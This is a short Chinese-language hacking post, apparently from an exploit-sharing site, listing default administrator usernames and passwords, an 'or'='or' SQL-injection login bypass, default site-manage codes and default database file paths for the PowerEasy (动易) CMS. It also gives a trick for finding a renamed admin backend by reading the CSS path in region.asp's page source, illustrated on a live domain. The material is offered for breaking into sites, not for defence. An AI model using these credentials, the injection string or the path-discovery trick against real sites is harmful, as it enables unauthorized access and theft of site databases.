动易的默认数据库、用户和密码、认证码大全还有找后台方法

admin
admin888
'or'='or'
8888
2007
2008
2006
SiteManageCode8888/SiteManageCode
database/SiteWeaver6.5.mdb
database/SiteWeaver.mdb
PowerEasy2006
PowerEasy2007
PowerEasy2008
database/PowerEasy2006.mdb
database/PowerEasy2007.mdb
database/PowerEasy2008.mdb
找后台方法:


    这个方法很巧,但也不是全部都行,因为有些的已经修改admin_login.asp的名称,针对修改路径是很有效的,也可以说是利用了管理员对css的疏忽 
  漏洞文件: 
  region.asp 
  1、打开某动易核心的网站,在域名后加region.asp访问,如http://www.80lr.com/region.asp 
  便会显示下面的内容: 
  国家/地区: 
  省/市/自治区: 
  市/县/区/旗: 
  2、然后查看“源文件”,在第四行有一段嵌入css的代码 
   
  可以看到路径是:"www.80lr.com/Admin/Admin_Style.css",便得知后台路径为“Admin/”,即“Admin_Style.css”前面的文件夹路径为后台路径 
  原因: 
  调用的CSS文件存放在后台目录下,导致利用源代码的查询而获取物理路径. 
本文来自易寒网络,转载务必注明原文链接:http://www.80lr.com/oday/229.html


你可能感兴趣的:(CMS)